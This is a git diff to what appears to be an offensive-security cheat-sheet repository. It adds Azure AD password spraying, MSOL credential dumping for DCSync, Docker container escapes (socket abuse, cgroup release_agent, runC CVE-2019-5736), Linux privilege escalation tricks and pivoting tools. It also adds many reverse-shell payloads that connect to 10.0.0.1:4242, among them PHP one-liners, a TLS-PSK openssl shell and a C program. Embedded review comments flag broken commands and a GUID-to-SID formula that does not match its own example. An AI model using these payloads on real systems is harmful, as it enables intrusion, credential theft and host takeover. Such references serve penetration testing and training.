@@ -187,6 +205,19 @@ PS C:\> .\AzureADRecon.ps1 -Credential $creds PS C:\>.\AzureADRecon.ps1 -GenExcel C:\AzureADRecon-Report- ``` +Stormspotter, graphing Azure and Azure Active Directory objects + +```powershell +$ docker run --name stormspotter -p7474:7474 -p7687:7687 -d --env NEO4J_AUTH=neo4j/[password] neo4j:3.5.18 +git clone https://github.com/Azure/Stormspotter +cd Stormspotter +pipenv install . +stormspotter --cli +stormdash -dbu -dbp +Browse to http://127.0.0.1:8050 to interact with the graph. +``` + +Other interesting commands to enumerate Azure AD. ```powershell # Azure AD powershell module @@ -251,6 +282,7 @@ ForEach($role in $roles) { $roleUsers ### Enumeration using Microburst +git clone https://github.com/NetSPI/MicroBurst/blob/master/Get-AzureADDomainInfo.ps1 Import-Module .\MicroBurst.psm1 # Anonymous enumeration @@ -258,6 +290,7 @@ Invoke-EnumerateAzureBlobs -Base company Invoke-EnumerateAzureSubDomains -base company -verbose # Authencticated enumeration +Get-AzureADDomainInfo Get-AzureDomainInfo -folder MicroBurst -VerboseGet-MSOLDomainInfo Get-MSOLDomainInfo ``` 
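Review bot: in the Stormspotter block, `Browse to http://127.0.0.1:8050 to interact with the graph.` is prose inside the code fence, and `stormdash -dbu -dbp` passes no values for its two options; move the sentence out of the fence and show placeholders such as `-dbu <neo4j_user> -dbp <neo4j_password>`. In the Microburst hunk, `git clone https://github.com/NetSPI/MicroBurst/blob/master/Get-AzureADDomainInfo.ps1` is a file (blob) URL, which `git clone` rejects; clone the repository URL `https://github.com/NetSPI/MicroBurst` instead. Nits in the surrounding context lines: "Authencticated" and the run-together `-VerboseGet-MSOLDomainInfo`, which should be two lines.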
@@ -270,6 +303,34 @@ With Microsoft, if you are using any cloud services (Office 365, Exchange Online 3. Pick the account from the active sessions 4. Select Azure Active Directory and enjoy! +## Azure AD - Password Spray + +> Default lockout policy of 10 failed attempts, locking out an account for 60 seconds + +```powershell +git clone https://github.com/dafthack/MSOLSpray +Import-Module .\MSOLSpray.ps1 +Invoke-MSOLSpray -UserList .\userlist.txt -Password Winter2020 +Invoke-MSOLSpray -UserList .\users.txt -Password d0ntSprayme! + +# UserList - UserList file filled with usernames one-per-line in the format "user@domain.com" +# Password - A single password that will be used to perform the password spray. +# OutFile - A file to output valid results to. +# Force - Forces the spray to continue and not stop when multiple account lockouts are detected. +# URL - The URL to spray against. Potentially useful if pointing at an API Gateway URL generated with something like FireProx to randomize the IP address you are authenticating from. +``` + +## Azure AD - Convert GUID to SID + +The user's AAD id is translated to SID by concatenating `"S-1–12–1-"` to the decimal representation of each section of the AAD Id. + +```powershell +GUID: [base16(a1)]-[base16(a2)]-[ base16(a3)]-[base16(a4)] +SID: S-1–12–1-[base10(a1)]-[ base10(a2)]-[ base10(a3)]-[ base10(a4)] +``` + +For example, the representation of `6aa89ecb-1f8f-4d92–810d-b0dce30b6c82` is `S-1–12–1–1789435595–1301421967–3702525313–2188119011` + ## Azure AD - Sign in with a service principal https://docs.microsoft.com/en-us/powershell/azure/authenticate-azureps?view=azps-3.3.0&viewFallbackFrom=azurermps-6.5.0#sign-in-with-a-service-principal 
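Review bot: the `## Azure AD - Convert GUID to SID` formula does not reproduce its own example: reading the hyphen-separated sections as hex gives 1789435595 for the first sub-authority, but for the second it gives 529485202 (0x1f8f4d92) rather than the stated 1301421967, which is 0x4d921f8f. The worked SID is correct only if the GUID's 16-byte in-memory layout is read as four little-endian 32-bit integers (the third and fourth values 3702525313 = 0xdcb00d81 and 2188119011 = 0x826c0be3 confirm this), so the text should state that rule rather than "decimal representation of each section". Also the `S-1–12–1-` prefix, the example GUID and the example SID use en-dashes (–) where hyphens are required, which breaks copy/paste and searching for the SID.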
@@ -313,7 +374,11 @@ Prerequisite: * Compromise a server with Azure AD Connect service * Access to ADSyncAdmins or local Administrators groups -Use the script **azuread_decrypt_msol.ps1** from @xpn : https://gist.github.com/xpn/0dc393e944d8733e3c63023968583545#file-azuread_decrypt_msol-ps1 to recover the decrypted password for the MSOL account +Use the script **azuread_decrypt_msol.ps1** from @xpn to recover the decrypted password for the MSOL account: +* `azuread_decrypt_msol.ps1`: AD Connect Sync Credential Extract POC https://gist.github.com/xpn/0dc393e944d8733e3c63023968583545 +* `azuread_decrypt_msol_v2.ps1`: Updated method of dumping the MSOL service account (which allows a DCSync) used by Azure AD Connect Sync https://gist.github.com/xpn/f12b145dba16c2eebdd1c6829267b90c + +Now you can use the retrieved credentials for the MSOL Account to launch a DCSync attack. ## Azure AD Connect - Seamless Single Sign On Silver Ticket 
@@ -411,13 +476,14 @@ NOTE: By default, O365 has a lockout policy of 10 tries, and it will lock out an https://fws.domain.com/o365/visfed/intrdomain/se/?username=firstname.lastname%40domain.com&wa=wsignin1.0&wtrealm=urn%3afederation%3aMicrosoftOnline&wctx= ``` +* Validate email : https://github.com/LMGsec/o365creeper `o365creeper.py -f emails.txt -o validemails.txt` * Extract email lists with a valid credentials : https://github.com/nyxgeek/o365recon ## References * [An introduction to penetration testing Azure - Graceful Security](https://www.gracefulsecurity.com/an-introduction-to-penetration-testing-azure/) -* [Running POwershell scripts on Azure VM - Netspi](https://blog.netspi.com/running-powershell-scripts-on-azure-vms/) +* [Running Powershell scripts on Azure VM - Netspi](https://blog.netspi.com/running-powershell-scripts-on-azure-vms/) * [Attacking Azure Cloud shell - Netspi](https://blog.netspi.com/attacking-azure-cloud-shell/) * [Maintaining Azure Persistence via automation accounts - Netspi](https://blog.netspi.com/maintaining-azure-persistence-via-automation-accounts/) * [Detecting an attacks on active directory with Azure - Smartspate](https://www.smartspate.com/detecting-an-attacks-on-active-directory-with-azure/) 
@@ -426,4 +492,9 @@ NOTE: By default, O365 has a lockout policy of 10 tries, and it will lock out an * [Building Free Active Directory Lab in Azure - @kamran.bilgrami](https://medium.com/@kamran.bilgrami/ethical-hacking-lessons-building-free-active-directory-lab-in-azure-6c67a7eddd7f) * [Attacking Azure/Azure AD and introducing Powerzure - SpecterOps](https://posts.specterops.io/attacking-azure-azure-ad-and-introducing-powerzure-ca70b330511a) * [Azure AD connect for RedTeam - @xpnsec](https://blog.xpnsec.com/azuread-connect-for-redteam/) -* [Azure Privilege Escalation Using Managed Identities - Karl Fosaaen - February 20th, 2020](https://blog.netspi.com/azure-privilege-escalation-using-managed-identities/) \ No newline at end of file +* [Azure Privilege Escalation Using Managed Identities - Karl Fosaaen - February 20th, 2020](https://blog.netspi.com/azure-privilege-escalation-using-managed-identities/) +* [Hunting Azure Admins for Vertical Escalation - LEE KAGAN - MARCH 13, 2020](https://www.lares.com/hunting-azure-admins-for-vertical-escalation/) +* [Introducing ROADtools - The Azure AD exploration framework - Dirk-jan Mollema](https://dirkjanm.io/introducing-roadtools-and-roadrecon-azure-ad-exploration-framework/) +* [Moving laterally between Azure AD joined machines - Tal Maor - Mar 17, 2020](https://medium.com/@talthemaor/moving-laterally-between-azure-ad-joined-machines-ed1f8871da56) +* [AZURE AD INTRODUCTION FOR RED TEAMERS - Written by Aymeric Palhière (bak) - 2020-04-20](https://www.synacktiv.com/posts/pentest/azure-ad-introduction-for-red-teamers.html) +* [Impersonating Office 365 Users With Mimikatz - January 15, 2017 - Michael Grafnetter](https://www.dsinternals.com/en/impersonating-office-365-users-mimikatz/) \ No newline at end of file diff --git a/Methodology and Resources/Container - Docker Pentest.md b/Methodology and Resources/Container - Docker Pentest.md new file mode 100644 index 0000000..b8faaa3 --- /dev/null 
+++ b/Methodology and Resources/Container - Docker Pentest.md 
@@ -0,0 +1,186 @@ +# Docker Pentest + +> Docker is a set of platform as a service (PaaS) products that uses OS-level virtualization to deliver software in packages called containers. + +## Summary + +- [Tools](#tools) +- [Mounted Docker Socket](#mounted-docker-socket) +- [Open Docker API Port](#open-docker-api-port) +- [Insecure Docker Registry](#insecure-docker-registry) +- [Exploit privileged container abusing the Linux cgroup v1](#exploit-privileged-container-abusing-the-linux-cgroup-v1) +- [Breaking out of Docker via runC](#breaking-out-of-docker-via-runc) +- [Breaking out of containers using a device file](#breaking-out-of-containers-using-a-device-file) +- [References](#references) + +## Tools + +* Dockscan : https://github.com/kost/dockscan + ```powershell + dockscan unix:///var/run/docker.sock + dockscan -r html -o myreport -v tcp://example.com:5422 + ``` + +## Mounted Docker Socket + +Prerequisite: +* Socker mounted as volume : `- "/var/run/docker.sock:/var/run/docker.sock"` + +Usually found in `/var/run/docker.sock`, for example for Portainer. + +```powershell +curl --unix-socket /var/run/docker.sock http://127.0.0.1/containers/json +curl -XPOST –unix-socket /var/run/docker.sock -d '{"Image":"nginx"}' -H 'Content-Type: application/json' http://localhost/containers/create +curl -XPOST –unix-socket /var/run/docker.sock http://localhost/containers/ID_FROM_PREVIOUS_COMMAND/start +``` + +Exploit using [brompwnie/ed](https://github.com/brompwnie/ed) + +```powershell +root@37bb034797d1:/tmp# ./ed_linux_amd64 -path=/var/run/ -autopwn=true +[+] Hunt dem Socks +[+] Hunting Down UNIX Domain Sockets from: /var/run/ +[*] Valid Socket: /var/run/docker.sock +[+] Attempting to autopwn +[+] Hunting Docker Socks +[+] Attempting to Autopwn: /var/run/docker.sock +[*] Getting Docker client... +[*] Successfully got Docker client... +[+] Attempting to escape to host... 
+[+] Attempting in TTY Mode +chroot /host && clear +echo 'You are now on the underlying host' +chroot /host && clear +echo 'You are now on the underlying host' +/ # chroot /host && clear +/ # echo 'You are now on the underlying host' +You are now on the underlying host +/ # id +uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video) +``` + + +## Open Docker API Port + +Prerequisite: +* Docker runned with `-H tcp://0.0.0.0:XXXX` + +```powershell +$ nmap -sCV 10.10.10.10 -p 2376 +2376/tcp open docker Docker 19.03.5 +| docker-version: +| Version: 19.03.5 +| MinAPIVersion: 1.12 +``` + +Mount the current system inside a new "temporary" Ubuntu container, you will gain root access to the filesystem in `/mnt`. + +```powershell +$ export DOCKER_HOST=tcp://10.10.10.10:2376 +$ docker run --name ubuntu_bash --rm -i -v /:/mnt -u 0 -t ubuntu bash +or +$ docker -H open.docker.socket:2375 ps +$ docker -H open.docker.socket:2375 exec -it mysql /bin/bash +or +$ curl -s –insecure https://tls-opendocker.socket:2376/secrets | jq +$ curl –insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket2376/containers/create?name=test -d '{"Image":"alpine", "Cmd":["/usr/bin/tail", "-f", "1234", "/dev/null"], "Binds": [ "/:/mnt" ], "Privileged": true}' +``` + +From there you can backdoor the filesystem by adding an ssh key in `/root/.ssh` or adding a new root user in `/etc/passwd`. + + +## Insecure Docker Registry + +Docker Registry’s fingerprint is `Docker-Distribution-Api-Version` header. Then connect to Registry API endpoint: `/v2/_catalog`. 
+ +```powershell +curl https://registry.example.com/v2//tags/list +docker pull https://registry.example.com:443/: + +# connect to the endpoint and list image blobs +curl -s -k --user "admin:admin" https://docker.registry.local/v2/_catalog +curl -s -k --user "admin:admin" https://docker.registry.local/v2/wordpress-image/tags/list +curl -s -k --user "admin:admin" https://docker.registry.local/v2/wordpress-image/manifests/latest +# download blobs +curl -s -k --user 'admin:admin' 'http://docker.registry.local/v2/wordpress-image/blobs/sha256:c314c5effb61c9e9c534c81a6970590ef4697b8439ec6bb4ab277833f7315058' > out.tar.gz +# automated download +https://github.com/NotSoSecure/docker_fetch/ +python /opt/docker_fetch/docker_image_fetch.py -u http://admin:admin@docker.registry.local +``` + +Access a private registry and start a container with one of its image + +```powershell +docker login -u admin -p admin docker.registry.local +docker pull docker.registry.local/wordpress-image +docker run -it docker.registry.local/wordpress-image /bin/bash +``` + +Access a private registry using OAuth Token from Google + +```powershell +curl http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/email +curl -s http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/token +docker login -e -u oauth2accesstoken -p "" https://gcr.io +``` + +## Exploit privileged container abusing the Linux cgroup v1 + +Prerequisite (at least one): + * `--privileged` + * `--security-opt apparmor=unconfined --cap-add=SYS_ADMIN` flags. 
+ +```powershell +docker run --rm -it --cap-add=SYS_ADMIN --security-opt apparmor=unconfined ubuntu bash -c 'echo "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" | base64 -d | bash -' +``` + +Exploit breakdown : + +```powershell +# On the host +docker run --rm -it --cap-add=SYS_ADMIN --security-opt apparmor=unconfined ubuntu bash + +# In the container +mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x + +echo 1 > /tmp/cgrp/x/notify_on_release +host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab` +echo "$host_path/cmd" > /tmp/cgrp/release_agent + +echo '#!/bin/sh' > /cmd +echo "ps aux > $host_path/output" >> /cmd +chmod a+x /cmd + +sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs" +``` + +## Breaking out of Docker via runC + +> The vulnerability allows a malicious container to (with minimal user interaction) overwrite the host runc binary and thus gain root-level code execution on the host. The level of user interaction is being able to run any command ... as root within a container in either of these contexts: Creating a new container using an attacker-controlled image. Attaching (docker exec) into an existing container which the attacker had previous write access to. 
- Vulnerability overview by the runC team + +Exploit for CVE-2019-5736 : https://github.com/twistlock/RunC-CVE-2019-5736 + +```powershell +$ docker build -t cve-2019-5736:malicious_image_POC ./RunC-CVE-2019-5736/malicious_image_POC +$ docker run --rm cve-2019-5736:malicious_image_POC +``` + +## Breaking out of containers using a device file + +```powershell +https://github.com/FSecureLABS/fdpasser +In container, as root: ./fdpasser recv /moo /etc/shadow +Outside container, as UID 1000: ./fdpasser send /proc/$(pgrep -f "sleep 1337")/root/moo +Outside container: ls -la /etc/shadow +Output: -rwsrwsrwx 1 root shadow 1209 Oct 10 2019 /etc/shadow +``` + +## References + +- [Hacking Docker Remotely - 17 March 2020 - ch0ks](https://hackarandas.com/blog/2020/03/17/hacking-docker-remotely/) +- [Understanding Docker container escapes - JULY 19, 2019 - Trail of Bits](https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/) +- [Capturing all the flags in BSidesSF CTF by pwning our infrastructure - Hackernoon](https://hackernoon.com/capturing-all-the-flags-in-bsidessf-ctf-by-pwning-our-infrastructure-3570b99b4dd0) +- [Breaking out of Docker via runC – Explaining CVE-2019-5736 - Yuval Avrahami - February 21, 2019](https://unit42.paloaltonetworks.com/breaking-docker-via-runc-explaining-cve-2019-5736/) +- [CVE-2019-5736: Escape from Docker and Kubernetes containers to root on host - dragonsector.pl](https://blog.dragonsector.pl/2019/02/cve-2019-5736-escape-from-docker-and.html) +- [OWASP - Docker Security CheatSheet](https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/Docker_Security_Cheat_Sheet.md) +- [Anatomy of a hack: Docker Registry - NotSoSecure - April 6, 2017](https://www.notsosecure.com/anatomy-of-a-hack-docker-registry/) \ No newline at end of file diff --git a/Methodology and Resources/Linux - Privilege Escalation.md b/Methodology and Resources/Linux - Privilege Escalation.md index e11bcee..5dad4e3 100644 
--- a/Methodology and Resources/Linux - Privilege Escalation.md +++ b/Methodology and Resources/Linux - Privilege Escalation.md @@ -10,6 +10,9 @@ * [Last edited files](#last-edited-files) * [In memory passwords](#in-memory-passwords) * [Find sensitive files](#find-sensitive-files) +* [SSH Key](#ssh-key) + * [Sensitive files](#sensitive-files) + * [SSH Key Predictable PRNG (Authorized_Keys) Process](#ssh-key-predictable-prng-authorized_keys-process) * [Scheduled tasks](#scheduled-tasks) * [Cron jobs](#cron-jobs) * [Systemd timers](#systemd-timers) @@ -25,6 +28,7 @@ * [LD_PRELOAD and NOPASSWD](#ld_preload-and-nopasswd) * [Doas](#doas) * [sudo_inject](#sudo-inject) + * [CVE-2019-14287](#cve-2019-14287) * [GTFOBins](#gtfobins) * [Wildcard](#wildcard) * [Writable files](#writable-files) 
@@ -182,6 +186,61 @@ $ locate password | more ... ``` +## SSH Key + +### Sensitive files + +``` +find / -name authorized_keys 2> /dev/null +find / -name id_rsa 2> /dev/null +... +``` + +### SSH Key Predictable PRNG (Authorized_Keys) Process + +This module describes how to attempt to use an obtained authorized_keys file on a host system. + +Needed : SSH-DSS String from authorized_keys file + +**Steps** + +1. Get the authorized_keys file. An example of this file would look like so: + +``` +ssh-dss AAAA487rt384ufrgh432087fhy02nv84u7fg839247fg8743gf087b3849yb98304yb9v834ybf ... (snipped) ... +``` + +2. Since this is an ssh-dss key, we need to add that to our local copy of `/etc/ssh/ssh_config` and `/etc/ssh/sshd_config`: + +``` +echo "PubkeyAcceptedKeyTypes=+ssh-dss" >> /etc/ssh/ssh_config +echo "PubkeyAcceptedKeyTypes=+ssh-dss" >> /etc/ssh/sshs_config +/etc/init.d/ssh restart +``` + +3. Get [g0tmi1k's debian-ssh repository](https://github.com/g0tmi1k/debian-ssh) and unpack the keys: + +``` +git clone https://github.com/g0tmi1k/debian-ssh +cd debian-ssh +tar vjxf common_keys/debian_ssh_dsa_1024_x86.tar.bz2 +``` + +4. Grab the first 20 or 30 bytes from the key file shown above starting with the `"AAAA..."` portion and grep the unpacked keys with it as: + +``` +grep -lr 'AAAA487rt384ufrgh432087fhy02nv84u7fg839247fg8743gf087b3849yb98304yb9v834ybf' +dsa/1024/68b329da9893e34099c7d8ad5cb9c940-17934.pub +``` + +5. IF SUCCESSFUL, this will return a file (68b329da9893e34099c7d8ad5cb9c940-17934.pub) public file. To use the private key file to connect, drop the '.pub' extension and do: + +``` +ssh -vvv victim@target -i 68b329da9893e34099c7d8ad5cb9c940-17934 +``` + +And you should connect without requiring a password. If stuck, the `-vvv` verbosity should provide enough details as to why. + ## Scheduled tasks ### Cron jobs 
@@ -331,6 +390,7 @@ uid=0(root) gid=1000(swissky) | CAP_NET_BIND_SERVICE | SERVICE Bind a socket to internet domain privileged ports | ## SUDO + Tool: [Sudo Exploitation](https://github.com/TH3xACE/SUDO_KILLER) ### NOPASSWD @@ -401,6 +461,18 @@ uid=0(root) gid=0(root) groups=0(root) Slides of the presentation : [https://github.com/nongiach/sudo_inject/blob/master/slides_breizh_2019.pdf](https://github.com/nongiach/sudo_inject/blob/master/slides_breizh_2019.pdf) + +### CVE-2019-14287 + +```powershell +# Exploitable when a user have the following permissions (sudo -l) +(ALL, !root) ALL + +# If you have a full TTY, you can exploit it like this +sudo -u#-1 /bin/bash +sudo -u#4294967295 id +``` + ## GTFOBins [GTFOBins](https://gtfobins.github.io) is a curated list of Unix binaries that can be exploited by an attacker to bypass local security restrictions. @@ -434,11 +506,26 @@ Tool: [wildpwn](https://github.com/localh0t/wildpwn) List world writable files on the system. ```powershell -find / -writable ! -user \`whoami\` -type f ! -path "/proc/*" ! -path "/sys/*" -exec ls -al {} \; 2>/dev/null +find / -writable ! -user `whoami` -type f ! -path "/proc/*" ! -path "/sys/*" -exec ls -al {} \; 2>/dev/null find / -perm -2 -type f 2>/dev/null find / ! -path "*/proc/*" -perm -2 -type f -print 2>/dev/null ``` +### Writable /etc/sysconfig/network-scripts/ (Centos/Redhat) + +/etc/sysconfig/network-scripts/ifcfg-1337 for example + +```powershell +NAME=Network /bin/id <= Note the blank space +ONBOOT=yes +DEVICE=eth0 + +EXEC : +./etc/sysconfig/network-scripts/ifcfg-1337 +``` +src : [https://vulmon.com/exploitdetailsqidtp=maillist_fulldisclosure&qid=e026a0c5f83df4fd532442e1324ffa4f] +(https://vulmon.com/exploitdetails?qidtp=maillist_fulldisclosure&qid=e026a0c5f83df4fd532442e1324ffa4f) + ### Writable /etc/passwd First generate a password with one of the following commands. 
@@ -696,4 +783,5 @@ https://www.exploit-db.com/exploits/18411 - [Editing /etc/passwd File for Privilege Escalation - Raj Chandel - MAY 12, 2018](https://www.hackingarticles.in/editing-etc-passwd-file-for-privilege-escalation/) - [Privilege Escalation by injecting process possessing sudo tokens - @nongiach @chaignc](https://github.com/nongiach/sudo_inject) * [Linux Password Security with pam_cracklib - Hal Pomeranz, Deer Run Associates](http://www.deer-run.com/~hal/sysadmin/pam_cracklib.html) -* [Local Privilege Escalation Workshop - Slides.pdf - @sagishahar](https://github.com/sagishahar/lpeworkshop/blob/master/Local%20Privilege%20Escalation%20Workshop%20-%20Slides.pdf) \ No newline at end of file +* [Local Privilege Escalation Workshop - Slides.pdf - @sagishahar](https://github.com/sagishahar/lpeworkshop/blob/master/Local%20Privilege%20Escalation%20Workshop%20-%20Slides.pdf) +* [SSH Key Predictable PRNG (Authorized_Keys) Process - @weaknetlabs](https://github.com/weaknetlabs/Penetration-Testing-Grimoire/blob/master/Vulnerabilities/SSH/key-exploit.md) diff --git a/Methodology and Resources/Miscellaneous - Tricks.md b/Methodology and Resources/Miscellaneous - Tricks.md new file mode 100644 index 0000000..1794178 --- /dev/null +++ b/Methodology and Resources/Miscellaneous - Tricks.md @@ -0,0 +1,17 @@ +# Miscellaneous & Tricks + +All the tricks that couldn't be classified somewhere else. + +## Send a message to another user + +```powershell +# Windows +PS C:\> msg Swissky /SERVER:CRASHLAB "Stop rebooting the XXXX service !" +PS C:\> msg * /V /W /SERVER:CRASHLAB "Hello all !" + +# Linux +$ wall "Stop messing with the XXX service !" +$ wall -n "System will go down for 2 hours maintenance at 13:00 PM" # "-n" only for root +$ who +$ write root pts/2 # press Ctrl+D after typing the message. +``` \ No newline at end of file 
diff --git a/Methodology and Resources/Network Pivoting Techniques.md b/Methodology and Resources/Network Pivoting Techniques.md index 2fa5a50..cd4bc9e 100644 --- a/Methodology and Resources/Network Pivoting Techniques.md +++ b/Methodology and Resources/Network Pivoting Techniques.md @@ -12,6 +12,8 @@ * [Metasploit](#metasploit) * [sshuttle](#sshuttle) * [chisel](#chisel) + * [SharpChisel](#sharpchisel) +* [gost](#gost) * [Rpivot](#rpivot) * [RevSocks](#revsocks) * [plink](#plink) @@ -151,6 +153,12 @@ pacman -Sy sshuttle apt-get install sshuttle sshuttle -vvr user@10.10.10.10 10.1.1.0/24 sshuttle -vvr username@pivot_host 10.2.2.0/24 + +# using a private key +$ sshuttle -vvr root@10.10.10.10 10.1.1.0/24 -e "ssh -i ~/.ssh/id_rsa" + +# -x == exclude some network to not transmit over the tunnel +# -x x.x.x.x.x/24 ``` ## chisel 
@@ -164,6 +172,40 @@ user@victim$ .\chisel.exe client YOUR_IP:8008 R:88:127.0.0.1:88 R:389:localhost: user@hacker$ /opt/chisel/chisel server -p 8008 --reverse ``` +### SharpChisel + +A C# Wrapper of Chisel : https://github.com/shantanu561993/SharpChisel + +```powershell +user@hacker$ ./chisel server -p 8080 --key "private" --auth "user:pass" --reverse --proxy "https://www.google.com" +================================================================ +server : run the Server Component of chisel +-p 8080 : run server on port 8080 +--key "private": use "private" string to seed the generation of a ECDSA public and private key pair +--auth "user:pass" : Creds required to connect to the server +--reverse: Allow clients to specify reverse port forwarding remotes in addition to normal remotes. +--proxy https://www.google.com : Specifies another HTTP server to proxy requests to when chisel receives a normal HTTP request. Useful for hiding chisel in plain sight. + +user@victim$ SharpChisel.exe client --auth user:pass https://redacted.cloudfront.net R:1080:socks +``` + +## Gost + +> Wiki English : https://docs.ginuerzh.xyz/gost/en/ + +```powershell +git clone https://github.com/ginuerzh/gost +cd gost/cmd/gost +go build + +# Socks5 Proxy +Server side: gost -L=socks5://:1080 +Client side: gost -L=:8080 -F=socks5://server_ip:1080?notls=true + +# Local Port Forward +gost -L=tcp://:2222/192.168.1.1:22 [-F=..] +``` + ## Rpivot Server (Attacker box) 
@@ -299,4 +341,5 @@ unzip ngrok-stable-linux-amd64.zip * [Using the SSH "Konami Code" (SSH Control Sequences) - Jeff McJunkin](https://pen-testing.sans.org/blog/2015/11/10/protected-using-the-ssh-konami-code-ssh-control-sequences) * [A Red Teamer's guide to pivoting- Mar 23, 2017 - Artem Kondratenko](https://artkond.com/2017/03/23/pivoting-guide/) * [Pivoting Meterpreter](https://www.information-security.fr/pivoting-meterpreter/) -* [Etat de l’art du pivoting réseau en 2019 - Oct 28,2019 - Alexandre Zanni](https://cyberdefense.orange.com/fr/blog/etat-de-lart-du-pivoting-reseau-en-2019/) \ No newline at end of file +* [Etat de l’art du pivoting réseau en 2019 - Oct 28,2019 - Alexandre Zanni](https://cyberdefense.orange.com/fr/blog/etat-de-lart-du-pivoting-reseau-en-2019/) +* [Red Team: Using SharpChisel to exfil internal network - Shantanu Khandelwal - Jun 8](https://medium.com/@shantanukhande/red-team-using-sharpchisel-to-exfil-internal-network-e1b07ed9b49) \ No newline at end of file diff --git a/Methodology and Resources/Reverse Shell Cheatsheet.md b/Methodology and Resources/Reverse Shell Cheatsheet.md index 9eb5efc..2617724 100644 --- a/Methodology and Resources/Reverse Shell Cheatsheet.md +++ b/Methodology and Resources/Reverse Shell Cheatsheet.md @@ -25,6 +25,7 @@ * [NodeJS](#nodejs) * [Groovy](#groovy) * [Groovy Alternative 1](#groovy-alternative-1) + * [C](#c) * [Meterpreter Shell](#meterpreter-shell) * [Windows Staged reverse TCP](#windows-staged-reverse-tcp) * [Windows Stageless reverse TCP](#windows-stageless-reverse-tcp) @@ -54,6 +55,8 @@ Listener: nc -u -lvp 4242 ``` +Don't forget to check with others shell : sh, ash, bsh, csh, ksh, zsh, pdksh, tcsh, bash + ### Socat ```powershell 
@@ -111,6 +114,11 @@ C:\Python27\python.exe -c "(lambda __y, __g, __contextlib: [[[[[[[(s.connect(('1 ```bash php -r '$sock=fsockopen("10.0.0.1",4242);exec("/bin/sh -i <&3 >&3 2>&3");' +php -r '$sock=fsockopen("10.0.0.1",4242);shell_exec("/bin/sh -i <&3 >&3 2>&3");' +php -r '$sock=fsockopen("10.0.0.1",4242);`/bin/sh -i <&3 >&3 2>&3`;' +php -r '$sock=fsockopen("10.0.0.1",4242);system("/bin/sh -i <&3 >&3 2>&3");' +php -r '$sock=fsockopen("10.0.0.1",4242);passthru("/bin/sh -i <&3 >&3 2>&3");' +php -r '$sock=fsockopen("10.0.0.1",4242);popen("/bin/sh -i <&3 >&3 2>&3", "r");' ``` ```bash @@ -167,6 +175,17 @@ user@attack$ ncat --ssl -vv -l -p 4242 user@victim$ mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 10.0.0.1:4242 > /tmp/s; rm /tmp/s ``` +TLS-PSK (does not rely on PKI or self-signed certificates) +```bash +# generate 384-bit PSK +# use the generated string as a value for the two PSK variables from below +openssl rand -hex 48 +# server (attacker) +export LHOST="*"; export LPORT="4242"; export PSK="replacewithgeneratedpskfromabove"; openssl s_server -quiet -tls1_2 -cipher PSK-CHACHA20-POLY1305:PSK-AES256-GCM-SHA384:PSK-AES256-CBC-SHA384:PSK-AES128-GCM-SHA256:PSK-AES128-CBC-SHA256 -psk $PSK -nocert -accept $LHOST:$LPORT +# client (victim) +export RHOST="10.0.0.1"; export RPORT="4242"; export PSK="replacewithgeneratedpskfromabove"; export PIPE="/tmp/`openssl rand -hex 4`"; mkfifo $PIPE; /bin/sh -i < $PIPE 2>&1 | openssl s_client -quiet -tls1_2 -psk $PSK -connect $RHOST:$RPORT > $PIPE; rm $PIPE +``` + ### Powershell ```powershell 
@@ -292,6 +311,41 @@ Thread.start { } ``` +### C + +Compile with `gcc /tmp/shell.c --output csh && csh` + +```csharp +#include +#include +#include +#include +#include +#include +#include + +int main(void){ + int port = 4242; + struct sockaddr_in revsockaddr; + + int sockt = socket(AF_INET, SOCK_STREAM, 0); + revsockaddr.sin_family = AF_INET; + revsockaddr.sin_port = htons(port); + revsockaddr.sin_addr.s_addr = inet_addr("10.0.0.1"); + + connect(sockt, (struct sockaddr *) &revsockaddr, + sizeof(revsockaddr)); + dup2(sockt, 0); + dup2(sockt, 1); + dup2(sockt, 2); + + char * const argv[] = {"/bin/sh", NULL}; + execve("/bin/sh", argv, NULL); + + return 0; +} +``` + ## Meterpreter Shell ### Windows Staged reverse TCP @@ -393,6 +447,19 @@ lua: os.execute('/bin/sh') - nmap: `!sh` - mysql: `! bash` +Alternative TTY method + +``` +www-data@debian:/dev/shm$ su - user +su: must be run from a terminal + +www-data@debian:/dev/shm$ /usr/bin/script -qc /bin/bash /dev/null +www-data@debian:/dev/shm$ su - user +Password: P4ssW0rD + +user@debian:~$ +``` + ## Fully interactive reverse shell on Windows The introduction of the Pseudo Console (ConPty) in Windows has improved so much the way Windows handles terminals. diff --git a/Methodology and Resources/Windows - Mimikatz.md b/Methodology and Resources/Windows - Mimikatz.md index ff34988..46682b9 100644 --- a/Methodology and Resources/Windows - Mimikatz.md +++ b/Methodology and Resources/Windows - Mimikatz.md 
@@ -2,15 +2,16 @@ ## Summary -* [Mimikatz - Execute commands](#) -* [Mimikatz - Extract passwords](#) -* [Mimikatz - Mini Dump](#) -* [Mimikatz - Golden ticket](#) -* [Mimikatz - Skeleton key](#) -* [Mimikatz - RDP session takeover](#) -* [Mimikatz - Credential Manager & DPAPI](#) -* [Mimikatz - Commands list](#) -* [Mimikatz - Powershell version](#) +* [Mimikatz - Execute commands](#mimikatz---execute-commands) +* [Mimikatz - Extract passwords](#mimikatz---extract-passwords) +* [Mimikatz - Mini Dump](#mimikatz---mini-dump) +* [Mimikatz - Pass The Hash](#mimikatz---pass-the-hash) +* [Mimikatz - Golden ticket](#mimikatz---golden-ticket) +* [Mimikatz - Skeleton key](#mimikatz---skeleton-key) +* [Mimikatz - RDP session takeover](#mimikatz---rdp-session-takeover) +* [Mimikatz - Credential Manager & DPAPI](#mimikatz---credential-manager--dpapi) +* [Mimikatz - Commands list](#mimikatz---commands-list) +* [Mimikatz - Powershell version](#mimikatz---powershell-version) * [References](#references) ![Data in memory](http://adsecurity.org/wp-content/uploads/2014/11/Delpy-CredentialDataChart.png) @@ -109,6 +110,8 @@ rdesktop 10.0.0.2:3389 -u test -p mimikatz -d pentestlab ## Mimikatz - RDP session takeover +Use `ts::multirdp` to patch the RDP service to allow more than two users. + 